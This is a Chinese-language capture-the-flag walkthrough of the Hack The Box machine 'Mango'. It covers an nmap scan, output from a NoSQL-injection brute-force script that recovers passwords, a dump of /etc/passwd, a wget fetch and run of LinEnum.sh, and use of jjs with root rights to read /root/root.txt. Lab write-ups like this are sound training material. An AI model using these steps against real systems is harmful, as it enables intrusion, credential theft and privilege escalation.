Hack the box – Mango

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

摘要

· nosql 注入

· jjs 文件读取

信息收集

nmap扫出了 22 , 80 , 443 端口

[email protected]:~# nmap -sC -sV -p 80,22,443 10.10.10.162Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:53 CSTNmap scan report for bogon (10.10.10.162)Host is up (0.44s latency).  PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: 403 Forbidden443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: Mango | Search Base| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN| Not valid before: 2019-09-27T14:21:19|_Not valid after:  2020-09-26T14:21:19|_ssl-date: TLS randomness does not represent time| tls-alpn: |_  http/1.1Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

80端口的web并没有什么发现访问443,https的 web 弹出证书提示点击错误代码提示,发现证书

证书解密

发现新站点 staging-order.mango.htb

Nosql 注入

发现登录框mango-nosql注入

[email protected]:~/hackthebox_workspace/finish/Mango#./brute.pyhh3h3mh3mXh3mXKh3mXK8h3mXK8Rh3mXK8Rhh3mXK8RhUh3mXK8RhU~h3mXK8RhU~fh3mXK8RhU~f{h3mXK8RhU~f{]h3mXK8RhU~f{]fh3mXK8RhU~f{]f5h3mXK8RhU~f{]f5HMango password: h3mXK8RhU~f{]f5H

拿到密码后 ssh 登录,当前权限找不到user.txt,查看 passwd 发现 admin 用户

[email protected]:~$ cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologinsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologinsyslog:x:102:106::/home/syslog:/usr/sbin/nologinmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin_apt:x:104:65534::/nonexistent:/usr/sbin/nologinlxd:x:105:65534::/var/lib/lxd/:/bin/falseuuidd:x:106:110::/run/uuidd:/usr/sbin/nologindnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologinpollinate:x:109:1::/var/cache/pollinate:/bin/falsesshd:x:110:65534::/run/sshd:/usr/sbin/nologinmango:x:1000:1000:mango:/home/mango:/bin/bashadmin:x:4000000000:1001:,,,:/home/admin/:/bin/shmongodb:x:111:65534::/home/mongodb:/usr/sbin/nologin

nosql 注入获取 admin 账号

[email protected]:~/hackthebox_workspace/finish/Mango#./brute.pytt9t9Kt9Kct9KcSt9KcS3t9KcS3>t9KcS3>!t9KcS3>!0t9KcS3>!0Bt9KcS3>!0B#t9KcS3>!0B#2Admin password: t9KcS3>!0B#2

切换到 admin 账号,获取user.txt,利用python 和 wget 传输枚举脚本

kali:[email protected]:~/hackthebox_workspace# python -m SimpleHTTPServer 80  HTB server:[email protected]:/tmp$ wget http://10.10.xx.xx/[email protected]:/tmp$ chmod +x [email protected]:/tmp$ ./LinEnum.sh

发现了可以用 jjs(java嵌入式javascript引擎脚本工具https://www.runoob.com/java/java8-nashorn-javascript.html) 以 root 权限运行

https://gtfobins.github.io/gtfobins/jjs/#file-read

root       1993  0.0  4.0 2577268 82144 pts/1   Tl   05:55   0:02 jjs  [email protected]:/home/mango$ jjsWarning: The jjs tool is planned to be removed from a future JDK releasejjs> var BufferedReader = Java.type("java.io.BufferedReader");jjs> var FileReader = Java.type("java.io.FileReader");jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));jjs> while ((line = br.readLine()) != null) { print(line); }8a******************************